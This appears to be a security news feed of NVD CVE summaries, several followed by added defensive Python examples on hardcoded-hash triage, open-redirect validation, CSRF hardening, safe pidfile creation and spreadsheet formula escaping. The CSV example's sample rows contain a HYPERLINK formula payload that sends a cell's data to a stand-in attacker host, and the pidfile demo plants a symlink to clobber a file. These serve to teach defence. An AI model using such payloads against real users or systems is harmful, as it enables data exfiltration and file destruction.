‼ CVE-2022-24693 ‼
Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.)
via "National Vulnerability Database".
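Added example (not from NVD, Baicells or the SWHKD, Archer or other projects on this page): a triage helper for exactly this class of finding. Given passwd/shadow-style text pulled out of an unpacked firmware root filesystem, it lists every account that carries a real crypt(3) hash, names the scheme from the `$id$` prefix, and flags the ones that are cheap to crack offline. The sample shadow file is constructed; the hash strings are made-up values of the right shape, not credentials from any device.

```python
import re
from typing import Dict, List

# crypt(3)-style hashes as they appear in /etc/passwd or /etc/shadow entries
# inside an extracted firmware root filesystem. "$id$" prefixes identify the
# scheme; traditional DES crypt has no prefix and is 13 chars of [./0-9A-Za-z].
ENTRY_RE = re.compile(
    r"^(?P<user>[^:\s]+):"
    r"(?P<hash>\$(?:1|2[abxy]?|5|6|7|y)\$[^:\s]+|[./0-9A-Za-z]{13})"
    r"(?::|$)",
    re.MULTILINE,
)

PREFIX_TO_SCHEME = {
    "$1$": "md5crypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}


def scheme_of(h: str) -> str:
    """Name the hashing scheme from the crypt prefix (bcrypt uses several $2x$ ids)."""
    if h.startswith("$2"):
        return "bcrypt"
    for prefix, name in PREFIX_TO_SCHEME.items():
        if h.startswith(prefix):
            return name
    return "descrypt"


def find_crypt_credentials(text: str) -> List[Dict[str, str]]:
    """Every account in passwd/shadow-style text that carries a real hash.
    Locked markers ('*', '!') and the shadow pointer 'x' are skipped."""
    return [
        {"user": m["user"], "scheme": scheme_of(m["hash"]), "hash": m["hash"]}
        for m in ENTRY_RE.finditer(text)
    ]


def weak_schemes(findings: List[Dict[str, str]]) -> List[str]:
    """Accounts whose hash is cheap to crack offline once the firmware is in hand."""
    return [f["user"] for f in findings if f["scheme"] in ("descrypt", "md5crypt")]


# Constructed sample of an extracted /etc/shadow. The hashes are made-up strings
# of the right shape, not credentials from any real device.
SAMPLE_SHADOW = """\
root:$1$ZrK9mN2a$Q6vB7cJx9d3fGhLk8mPqR1:18000:0:99999:7:::
admin:$6$rounds=5000$saltsalt$hashhashhashhashhashhashhashhashhashhashhashhash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
sshd:!:18000:0:99999:7:::
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
legacy:ab9dUvx3KcPRq:18000:0:99999:7:::
"""

if __name__ == "__main__":
    found = find_crypt_credentials(SAMPLE_SHADOW)
    for f in found:
        print(f"{f['user']:<8} {f['scheme']:<12} {f['hash']}")
    print("cheap to crack offline:", weak_schemes(found))
```

Run it over every `passwd`/`shadow` file and any config that embeds crypt strings in the unpacked image; a hash that is identical across firmware versions or devices is the practical signature of a hardcoded credential rather than a per-unit one.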
‼ CVE-2022-26951 ‼
Archer 6.x through 6.10 (6.10.0.0) contains a reflected XSS vulnerability. A remote SAML-unauthenticated malicious Archer user could potentially exploit this vulnerability by tricking a victim application user into supplying malicious HTML or JavaScript code to the vulnerable web application; the malicious code is then reflected back to the victim and gets executed by the web browser in the context of the vulnerable web application.
via "National Vulnerability Database".
‼ CVE-2021-41594 ‼
In RSA Archer 6.9.SP1 P3, if some application functions are precluded by the Administrator, this can be bypassed by intercepting the API request at the /api/V2/internal/TaskPermissions/CheckTaskAccess endpoint. If the parameters of this request are replaced with empty fields, the attacker achieves access to the precluded functions.
via "National Vulnerability Database".
‼ CVE-2022-26950 ‼
Archer 6.x through 6.9 P2 (6.9.0.2) is affected by an open redirect vulnerability. A remote unprivileged attacker may potentially redirect legitimate users to arbitrary web sites and conduct phishing attacks. The attacker could then steal the victims' credentials and silently authenticate them to the Archer application without the victims realizing an attack occurred.
via "National Vulnerability Database".
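Added example (not Archer code, and not from NVD): the validation a "return to" / "next" parameter needs so that a login flow cannot be pointed at an attacker's site. The allow-list host `archer.example` and the parameter handling are assumptions for the illustration. It covers the usual bypasses of a naive "starts with /" check: scheme-relative `//host`, backslash and CR/LF tricks, `user@host` confusion and non-http schemes.

```python
from urllib.parse import urlsplit


def is_safe_redirect(target: str, allowed_hosts: set) -> bool:
    """True only for an absolute path inside the app or an http(s) URL on an allowed host."""
    if not target or target != target.strip():
        return False
    # Browsers treat '\' as '/', so '/\evil.example' leaves the site; CR/LF would
    # split the Location header into a second, attacker-written header.
    if any(c in target for c in "\\\r\n\t"):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:          # e.g. malformed IPv6 brackets
        return False
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL ('//evil.example/...'): http(s) only,
        # and the HOST must be on the allow-list. hostname (not netloc) strips
        # 'user@' and ':port', so 'https://archer.example@evil.example/' is
        # judged by 'evil.example', and 'https:///evil.example' has no host.
        if parts.scheme not in ("", "http", "https"):
            return False
        host = parts.hostname
        return bool(host) and host.lower() in allowed_hosts
    # No scheme and no authority: require an absolute path inside the application.
    return parts.path.startswith("/")


def redirect_target(requested: str, allowed_hosts: set, default: str = "/") -> str:
    """Where to send the user after login: the requested page if safe, else home."""
    return requested if is_safe_redirect(requested, allowed_hosts) else default


if __name__ == "__main__":
    hosts = {"archer.example"}
    for t in ["/dashboard", "https://archer.example/home", "//evil.example/login",
              "https://archer.example@evil.example/", "javascript:alert(1)",
              "/\\evil.example", "https:///evil.example"]:
        print(f"{t!r:45} -> {redirect_target(t, hosts)}")
```

Exact host matching is deliberate: a suffix check would accept `archer.example.evil.example`. When the app only ever needs in-site redirects, drop the host branch entirely and accept paths alone.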
‼ CVE-2020-24770 ‼
SQL injection vulnerability in modrules.php in NexusPHP 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.
via "National Vulnerability Database".
‼ CVE-2022-27816 ‼
SWHKD 1.1.5 unsafely uses the /tmp/swhks.pid pathname. There can be data loss or a denial of service.
via "National Vulnerability Database".
‼ CVE-2022-27432 ‼
A Cross-Site Request Forgery (CSRF) in Pluck CMS v4.7.15 allows attackers to change the password of any given user by exploiting this feature leading to account takeover.
via "National Vulnerability Database".
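Added example (not Pluck CMS code, and not from NVD): the unprotected password-change handler pattern next to a hardened one. Requests and the session store are plain dicts standing in for a web framework; `cms.example`, `evil.example`, the field names and the `CsrfError` type are assumptions. The hardened version combines a per-session synchronizer token compared in constant time, an Origin/Referer check, and re-authentication with the current password, so a form auto-submitted from an attacker's page has nothing the browser would attach on its own.

```python
import hmac
import secrets


class CsrfError(Exception):
    """Raised when a state-changing request cannot be tied to the user's own page."""


def issue_csrf_token(session: dict) -> str:
    """Per-session synchronizer token, created once and embedded in the form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers: dict, site_origin: str) -> bool:
    """Second line of defence: Origin (or Referer) must name our own site.
    A missing header is treated as cross-site for state-changing requests."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    return origin == site_origin or origin.startswith(site_origin + "/")


def change_password_vulnerable(session: dict, users: dict, form: dict) -> bool:
    # Pattern to avoid: the only thing checked is the session cookie, which the
    # victim's browser attaches automatically to a form submitted from ANY site.
    users[session["user"]] = form["new_password"]
    return True


def change_password_hardened(session: dict, users: dict, form: dict,
                             headers: dict, site_origin: str) -> bool:
    if not origin_allowed(headers, site_origin):
        raise CsrfError("cross-site origin")
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time compare; a missing or stale token fails closed.
    if not expected or not hmac.compare_digest(expected, supplied):
        raise CsrfError("missing or invalid CSRF token")
    # Re-authentication: a forged request cannot know the current password.
    # (Plaintext passwords here only to keep the demo short; store hashes.)
    user = session["user"]
    if form.get("current_password") != users[user]:
        raise CsrfError("current password mismatch")
    users[user] = form["new_password"]
    return True


def demo() -> dict:
    """Constructed requests: one forged from an attacker page, one from our own form."""
    site = "https://cms.example"
    users = {"alice": "old-secret"}
    session = {"user": "alice"}
    token = issue_csrf_token(session)

    forged = {"new_password": "attacker-chosen"}          # no token, no current password
    forged_headers = {"Origin": "https://evil.example"}
    change_password_vulnerable(session, users, forged)
    takeover = users["alice"] == "attacker-chosen"

    users["alice"] = "old-secret"
    try:
        change_password_hardened(session, users, forged, forged_headers, site)
        blocked = False
    except CsrfError:
        blocked = True

    legit = {"csrf_token": token, "current_password": "old-secret",
             "new_password": "new-secret"}
    change_password_hardened(session, users, legit, {"Origin": site}, site)
    return {"vulnerable_takeover": takeover, "hardened_blocked": blocked,
            "password": users["alice"]}


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer, but the token check stays: older clients and some navigation cases still send the cookie.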
‼ CVE-2022-27815 ‼
SWHKD 1.1.5 unsafely uses the /tmp/swhkd.pid pathname. There can be an information leak or denial of service.
via "National Vulnerability Database".
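Added example for the two SWHKD entries above (CVE-2022-27816 and CVE-2022-27815); it is not SWHKD's code and is not from NVD. It shows why a fixed name in the shared /tmp is dangerous in a constructed scenario: a local attacker plants a symlink at the expected pidfile path before the daemon starts, a plain `open(path, "w")` follows it and overwrites the link target, while a create-only, no-follow open refuses. The `swhkd.pid` / `victim.conf` names and the temp directory are assumptions.

```python
import os
import tempfile


def write_pidfile_unsafe(path: str, pid: int) -> None:
    # Pattern to avoid: a fixed, predictable name in the shared /tmp, opened with
    # plain open(). If another local user pre-created that name as a symlink, the
    # write lands wherever the link points (data loss); a pre-created unwritable
    # file makes startup fail (denial of service).
    with open(path, "w") as f:
        f.write(f"{pid}\n")


def write_pidfile_hardened(path: str, pid: int) -> None:
    # Create-only (fails if anything already exists), never follow a symlink,
    # owner-only permissions on the new file.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(f"{pid}\n")


def pidfile_path(name: str, fallback_dir: str) -> str:
    """Prefer the per-user runtime directory (mode 0700, not shared) over /tmp."""
    base = os.environ.get("XDG_RUNTIME_DIR") or fallback_dir
    return os.path.join(base, f"{name}.pid")


def demo() -> dict:
    """Constructed scenario inside a temp dir: the attacker plants a symlink first."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.conf")
        with open(victim, "w") as f:
            f.write("important config\n")
        pidfile = os.path.join(d, "swhkd.pid")
        os.symlink(victim, pidfile)           # attacker's move, before the daemon starts

        write_pidfile_unsafe(pidfile, 4242)   # follows the link: victim.conf is clobbered
        with open(victim) as f:
            clobbered = f.read() != "important config\n"

        try:
            write_pidfile_hardened(pidfile, 4242)
            refused = False
        except OSError:                       # EEXIST (or ELOOP without O_EXCL)
            refused = True

        fresh = os.path.join(d, "fresh.pid")
        write_pidfile_hardened(fresh, 4242)
        with open(fresh) as f:
            written = f.read()
        mode = os.stat(fresh).st_mode & 0o777
        return {"unsafe_clobbered": clobbered, "hardened_refused": refused,
                "fresh_content": written, "fresh_mode": mode}


if __name__ == "__main__":
    print(demo())
```

Refusing to start when the pidfile already exists is the right failure mode for a privileged daemon: a stale-pidfile cleanup step can follow, but it must operate on a path only the daemon's user can write to.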
‼ CVE-2022-1172 ‼
Null Pointer Dereference Caused Segmentation Fault in GitHub repository gpac/gpac prior to 2.1.0-DEV.
via "National Vulnerability Database".
‼ CVE-2022-23868 ‼
RuoYi v4.7.2 contains a CSV injection vulnerability through ruoyi-admin when a victim opens .xlsx log file.
via "National Vulnerability Database".
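Added example (not RuoYi code, and not from NVD): neutralising formula triggers in a spreadsheet export of attacker-influenced log fields. Python and the constructed log rows, column names and the `HYPERLINK` payload are assumptions; the rule is the same whether the export is CSV or xlsx, since what matters is the leading character of a text cell when the spreadsheet application opens it.

```python
import csv
import io
from typing import Iterable, List, Set

# Leading characters that make Excel or LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_formula(value: object) -> str:
    """Escape one text cell for a spreadsheet export.
    A leading single quote makes the application show the text verbatim.
    Leading whitespace is stripped before the check, conservatively."""
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_log_csv(rows: Iterable[dict], fieldnames: List[str],
                   text_fields: Set[str]) -> str:
    """Only free-text (user-controlled) fields are escaped; numeric and date
    columns are left alone so they still sort and sum in the spreadsheet."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    w.writeheader()
    for r in rows:
        w.writerow({k: (neutralize_formula(r.get(k)) if k in text_fields else r.get(k))
                    for k in fieldnames})
    return buf.getvalue()


# Constructed operation-log rows: the second one was written by a user who chose
# formula-shaped input for their name and request parameter.
SAMPLE_ROWS = [
    {"id": 1, "user": "admin", "action": "login", "param": "ip=10.0.0.1"},
    {"id": 2, "user": '=HYPERLINK("https://evil.example/?d="&A1;"open")',
     "action": "register", "param": "@SUM(1+1)"},
]
FIELDS = ["id", "user", "action", "param"]
TEXT_FIELDS = {"user", "action", "param"}

if __name__ == "__main__":
    print(export_log_csv(SAMPLE_ROWS, FIELDS, TEXT_FIELDS))
```

The quote prefix is a display-level fix and shows up in the exported text; the trade-off is accepted because the alternative (stripping characters) silently alters log evidence. Negative numbers in text columns get quoted too, which is why numeric columns are exported as numbers rather than strings.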
‼ CVE-2022-1177 ‼
Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.
via "National Vulnerability Database".
‼ CVE-2022-25598 ‼
Apache DolphinScheduler user registration is vulnerable to Regular expression Denial of Service (ReDoS) attacks; Apache DolphinScheduler users should upgrade to version 2.0.5 or higher.
via "National Vulnerability Database".
‼ CVE-2022-23869 ‼
In RuoYi v4.7.2 through the WebUI, user test1 does not have permission to reset the password of user test3, but the password of user test3 can be reset through the /system/user/resetPwd request.
via "National Vulnerability Database".
‼ CVE-2022-1178 ‼
Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.
via "National Vulnerability Database".
‼ CVE-2022-1155 ‼
Old sessions are not blocked by the login enable function in GitHub repository snipe/snipe-it prior to 5.3.10.
via "National Vulnerability Database".
‼ CVE-2022-1154 ‼
Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.
via "National Vulnerability Database".
‼ CVE-2022-1181 ‼
Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.2.
via "National Vulnerability Database".
‼ CVE-2022-24131 ‼
DouPHP v1.6 Release 20220121 is affected by Cross Site Scripting (XSS) through /admin/login.php in the background, which will lead to JavaScript code execution.
via "National Vulnerability Database".
‼ CVE-2022-1180 ‼
Reflected Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.
via "National Vulnerability Database".
‼ CVE-2022-1179 ‼
Non-Privileged User Can Create New Rule and Lead to Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.
via "National Vulnerability Database".
🕴 How Security Complexity Is Being Weaponized 🕴
As environments grow noisier, it becomes easier for attackers to intentionally create distractions.
via "Dark Reading".